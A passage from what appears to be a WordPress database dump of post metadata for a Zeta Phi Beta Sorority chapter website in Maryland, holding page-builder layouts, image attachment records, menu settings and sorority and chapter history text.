2020-2022</p>\";s:11:\"admin-label\";s:0:\"\";}i:4;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:15;s:11:\"admin-label\";s:0:\"\";}i:5;a:6:{s:4:\"type\";s:4:\"icon\";s:4:\"icon\";s:14:\"icon-threedots\";s:9:\"icon-size\";s:2:\"24\";s:10:\"icon-color\";s:7:\"#2741a6\";s:10:\"icon-align\";s:6:\"center\";s:11:\"admin-label\";s:0:\"\";}}}i:1;a:2:{s:4:\"size\";i:4;s:8:\"elements\";a:1:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:81:\"https://zphiblgz.org/wp-content/uploads/2021/09/2020-Basileus-LW-left-scaled.jpeg\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:5:\"_self\";s:5:\"align\";s:4:\"left\";}}}i:2;a:2:{s:4:\"size\";i:12;s:8:\"elements\";a:1:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:40;s:11:\"admin-label\";s:0:\"\";}}}i:3;a:2:{s:4:\"size\";i:8;s:8:\"elements\";a:3:{i:0;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:15:\"Upcoming Events\";s:11:\"title-color\";s:7:\"#3f4549\";s:8:\"subtitle\";s:0:\"\";s:14:\"subtitle-color\";s:7:\"#F8CABA\";s:5:\"style\";s:9:\"lineafter\";s:4:\"size\";s:2:\"h3\";s:11:\"admin-label\";s:0:\"\";}i:1;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:30;s:11:\"admin-label\";s:0:\"\";}i:2;a:10:{s:4:\"type\";s:6:\"events\";s:11:\"admin-label\";s:0:\"\";s:8:\"category\";s:26:\"52,51,23,44,53,69,55,43,54\";s:10:\"id-exclude\";s:0:\"\";s:13:\"exclude-first\";s:0:\"\";s:11:\"posts-limit\";s:1:\"6\";s:8:\"order-by\";s:10:\"start-date\";s:15:\"order-direction\";s:3:\"asc\";s:15:\"special-effects\";s:4:\"none\";s:10:\"pagination\";s:1:\"n\";}}}i:4;a:2:{s:4:\"size\";i:4;s:8:\"elements\";a:6:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:50;s:11:\"admin-label\";s:0:\"\";}i:1;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:60:\"https://zphiblgz.org/wp-content/uploads/2020/01/IMG_0733.jpg\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:5:\"_self\";s:5:\"align\";s:6:\"center\";}i:2;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:40;s:11:\"admin-label\";s:0:\"\";}i:3;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:40;s:11:\"admin-label\";s:0:\"\";}i:4;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:40;s:11:\"admin-label\";s:0:\"\";}i:5;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:63:\"https://zphiblgz.org/wp-content/uploads/2018/09/Websitelogo.png\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:6:\"center\";}}}}}}'),(5268,797,'_rawhtml_settings','0,0,0,0'),(5456,1401,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:4:\"file\";s:27:\"2020/07/all-youth-logos.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"all-youth-logos-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"all-youth-logos-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"all-youth-logos-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"all-youth-logos-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"all-youth-logos-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:27:\"all-youth-logos-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:27:\"all-youth-logos-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:27:\"all-youth-logos-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5455,1401,'_wp_attached_file','2020/07/all-youth-logos.png'),(5218,1318,'_menu_item_type','post_type'),(5219,1318,'_menu_item_menu_item_parent','0'),(5220,1318,'_menu_item_object_id','1313'),(5221,1318,'_menu_item_object','page'),(5222,1318,'_menu_item_target',''),(5223,1318,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5224,1318,'_menu_item_xfn',''),(5225,1318,'_menu_item_url',''),(5332,1353,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1400;s:6:\"height\";i:765;s:4:\"file\";s:20:\"2020/01/IMG_0726.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0726-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0726-300x164.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:164;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0726-768x420.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0726-1024x560.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:560;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0726-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"IMG_0726-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"IMG_0726-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0726-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1579378456\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5331,1353,'_wp_attached_file','2020/01/IMG_0726.jpg'),(5245,1321,'_menu_item_type','custom'),(5246,1321,'_menu_item_menu_item_parent','0'),(5247,1321,'_menu_item_object_id','1321'),(5248,1321,'_menu_item_object','custom'),(5249,1321,'_menu_item_target',''),(5250,1321,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5251,1321,'_menu_item_xfn',''),(5252,1321,'_menu_item_url','http://www.zphiblgz.org/scholarship'),(5254,738,'_rawhtml_settings','0,0,0,0'),(5255,1322,'_wp_attached_file','2018/09/Websitelogo.png'),(5256,1322,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:23:\"2018/09/Websitelogo.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Websitelogo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Websitelogo-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"Websitelogo-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:23:\"Websitelogo-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:23:\"Websitelogo-600x300.png\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:23:\"Websitelogo-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5188,1313,'ts_use_template','1'),(5185,6,'_rawhtml_settings','0,0,0,0'),(5186,1312,'_wp_attached_file','2018/09/MembershipImage.png'),(5187,1312,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2829;s:6:\"height\";i:1591;s:4:\"file\";s:27:\"2018/09/MembershipImage.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"MembershipImage-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"MembershipImage-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"MembershipImage-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"MembershipImage-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"MembershipImage-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:27:\"MembershipImage-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:27:\"MembershipImage-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:27:\"MembershipImage-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4108,1047,'_wp_attached_file','2014/12/celebrate.jpg'),(4109,1047,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:283;s:6:\"height\";i:211;s:4:\"file\";s:21:\"2014/12/celebrate.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"celebrate-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:21:\"celebrate-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5513,1444,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(3781,956,'_edit_lock','1500665473:5'),(3782,956,'_edit_last','5'),(3783,956,'ts_template','a:0:{}'),(3785,956,'video_embed',''),(3786,956,'audio_embed',''),(3787,956,'_post_image_gallery',''),(3788,956,'_yoast_wpseo_content_score','30'),(3789,956,'_yoast_wpseo_primary_category','2'),(3179,772,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(2253,59,'_um_accessible','0'),(2254,59,'_um_access_redirect2',''),(2255,59,'_um_access_roles','a:1:{i:0;s:1:\"0\";}'),(2256,59,'_um_access_redirect',''),(3108,90,'_edit_lock','1492554582:1'),(3107,90,'_wp_old_slug','bring-water-children__trashed'),(323,6,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(324,6,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(325,6,'page_settings','a:5:{s:10:\"hide_title\";s:2:\"no\";s:9:\"hide_meta\";s:2:\"no\";s:19:\"hide_social_sharing\";s:2:\"no\";s:12:\"hide_featimg\";s:2:\"no\";s:15:\"hide_author_box\";s:2:\"no\";}'),(326,6,'post_settings',NULL),(327,6,'_oembed_0a52bff1a0ebba89dbac0ba5f9b70da3','<iframe src=\"//player.vimeo.com/video/59567974\" width=\"300\" height=\"169\" frameborder=\"0\" title=\"Charity Children - Elizabeth (Official Video)\" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe>'),(328,6,'_oembed_time_0a52bff1a0ebba89dbac0ba5f9b70da3','1418895856'),(2062,563,'_um_can_view_all','0'),(2061,563,'_um_can_delete_profile','0'),(2060,563,'_um_can_edit_profile','0'),(2059,563,'_um_can_delete_everyone','0'),(2058,563,'_um_can_edit_everyone','0'),(2057,563,'_um_can_not_see_adminbar','1'),(2056,563,'_um_can_access_wpadmin','0'),(2055,563,'_um_synced_role','subscriber'),(2054,563,'ts_template','a:0:{}'),(2053,563,'_edit_lock','1480879618:1'),(2052,563,'_edit_last','1'),(2051,561,'_um_delete_redirect_url',''),(2050,561,'_um_after_delete','redirect_home'),(2049,561,'_um_logout_redirect_url',''),(2048,561,'_um_login_redirect_url',''),(2047,561,'_um_pending_url',''),(2046,561,'_um_pending_message','Membership to our site is restricted to members of Zeta Phi Beta Sorority Inc., Lambda Gamma Zeta chapter. '),(2045,561,'_um_pending_action','show_message'),(2044,561,'_um_url_email_activate',''),(2043,561,'_um_checkmail_url',''),(391,190,'ts_use_template','1'),(392,190,'_edit_last','1'),(393,190,'ts_template','a:1:{i:0;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"auto\";s:13:\"bgAttachement\";s:0:\"\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:3:{i:0;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:75;s:11:\"admin-label\";s:0:\"\";}}}i:1;a:2:{s:4:\"size\";i:8;s:8:\"elements\";a:8:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:60:\"https://zphiblgz.org/wp-content/uploads/2014/12/wordlogo.gif\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:6:\"center\";}i:1;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:1550:\"<p style=--quote--text-align: left;--quote--><span style=--quote--color: #2741a6;--quote--><strong>Zeta Phi Beta Sorority, Inc.</strong> </span>was founded January 16, 1920, on the campus of Howard University Washington, DC by 5 co-eds.  The founders of Zeta Phi Beta Sorority, Inc., <span style=--quote--color: #2741a6;--quote--><em><strong>Arizona Cleaver Stemons, Pearl Anna Neal, Myrtle Tyler Faithful, Viola Tyler Goings, and Fannie Pettie Watts,</strong></em></span> sought to create an organization that would hold academic achievement and service to the community in high esteem.  The founding principles of scholarship, service, sisterhood, and finer womanhood have sustained the founders\' legacies.  </p><p style=--quote--text-align: left;--quote-->The Sorority has 650 graduate and collegiate chapters located in all 50 states, Bahamas, Virgin Islands, West Africa, Germany, South Korea, Middle East, and Italy.</p><p style=--quote--text-align: left;--quote-->Zeta\'s trailblazing efforts are evident in being the first national panhellenic organization to establish a National Headquarters and form adult and youth auxiliaries. Zeta Phi Beta Sorority, Incorporated is the first and only Greek letter sorority that is constitutionally bound to a fraternity, Phi Beta Sigma Fraternity, Inc.  </p><p style=--quote--text-align: left;--quote-->For more information on Zeta Phi Beta Sorority, Inc. visit the <a href=--quote--http://www.zphib1920.org--quote-->National Website</a>. </p><p style=--quote--text-align: left;--quote--> </p>\";s:11:\"admin-label\";s:0:\"\";}i:3;a:6:{s:4:\"type\";s:4:\"icon\";s:4:\"icon\";s:14:\"icon-threedots\";s:9:\"icon-size\";s:0:\"\";s:10:\"icon-color\";s:7:\"#2741a6\";s:10:\"icon-align\";s:6:\"center\";s:11:\"admin-label\";s:0:\"\";}i:4;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:5;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:15:\"Chapter History\";s:11:\"title-color\";s:7:\"#2741a6\";s:8:\"subtitle\";s:0:\"\";s:14:\"subtitle-color\";s:7:\"#3f4549\";s:5:\"style\";s:10:\"simpleleft\";s:4:\"size\";s:2:\"h3\";s:11:\"admin-label\";s:0:\"\";}i:6;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:1664:\"<p style=--quote--text-align: left;--quote-->Lambda Gamma Zeta graduate chapter of Zeta Phi Beta Sorority, Inc. was chartered on September 29th, 1981 at the Wilde Lake Interfaith Center in Columbia, MD. Lambda Gamma Zeta was the 4th graduate chapter to be chartered in the state of Maryland. Charter members were Darling Barnes, Janette Bell, Ruth Bland, Marie Coates, W. Ruth Conway, Joyce Estes, Cynthia Harris, Cleopatra House*, Adrienne McCollum, Martha Myricks, Mary Nichols, Nathalia M. East-Roberts, Hilda Spencer*, Therese Suggs*, Rita Tiller, June Turner, Joanette Walker, and Mary Walker.</p><p>For 35 years, the members of Lambda Gamma Zeta have served the residents of Howard County, Maryland by providing scholarships for higher education to deserving African American high school seniors, sponsoring health fairs, promoting political awareness, and supporting the Domestic Violence Center of Howard County as well as other civic organizations. The chapter has held membership with various organizations in Howard County including the National Association for the Advancement of Colored People (NAACP), March of Dimes, Howard County Council of Elders, and Pan-Hellenic Council of Howard County.</p><p>Lambda Gamma Zeta serves in the Atlantic Region in the state of Maryland and can boast proudly of having Sorority State, Regional, and National elected and appointed officers as members.</p><p>For more information visit the <a href=--quote--http://www.atlanticregionzetas.org/--quote-->Atlantic Region </a>and the <a href=--quote--http://www.zphibmaryland.org/--quote-->State of Maryland</a>. </p><p style=--quote--text-align: left;--quote--> </p>\";s:11:\"admin-label\";s:0:\"\";}i:7;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}}}i:2;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:125;s:11:\"admin-label\";s:0:\"\";}}}}}}'),(4311,190,'_yoast_wpseo_content_score','30'),(4374,1150,'_wp_attached_file','2014/12/wordlogo.gif'),(4375,1150,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:956;s:6:\"height\";i:445;s:4:\"file\";s:20:\"2014/12/wordlogo.gif\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"wordlogo-150x150.gif\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/gif\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"wordlogo-300x140.gif\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/gif\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"wordlogo-768x357.gif\";s:5:\"width\";i:768;s:6:\"height\";i:357;s:9:\"mime-type\";s:9:\"image/gif\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"wordlogo-400x400.gif\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/gif\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"wordlogo-450x300.gif\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/gif\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"wordlogo-680x300.gif\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/gif\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"wordlogo-180x110.gif\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/gif\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2927,697,'_wp_attached_file','2014/12/th-3.jpg'),(2928,697,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:16:\"2014/12/th-3.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"th-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:16:\"th-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:16:\"th-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:16:\"th-3-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:16:\"th-3-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(394,190,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(395,190,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(396,190,'page_settings','a:5:{s:10:\"hide_title\";s:2:\"no\";s:9:\"hide_meta\";s:2:\"no\";s:19:\"hide_social_sharing\";s:2:\"no\";s:12:\"hide_featimg\";s:2:\"no\";s:15:\"hide_author_box\";s:2:\"no\";}'),(397,190,'post_settings',NULL),(3174,772,'ts_use_template','1'),(3175,772,'_edit_lock','1504982455:1'),(3176,772,'_edit_last','1'),(3177,772,'ts_template','a:2:{i:0;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"auto\";s:13:\"bgAttachement\";s:0:\"\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:3:{i:0;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:1:{s:4:\"type\";s:5:\"empty\";}}}i:1;a:2:{s:4:\"size\";i:8;s:8:\"elements\";a:6:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:60:\"https://zphiblgz.org/wp-content/uploads/2017/01/image1-1.png\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:6:\"center\";}i:1;a:4:{s:4:\"type\";s:9:\"delimit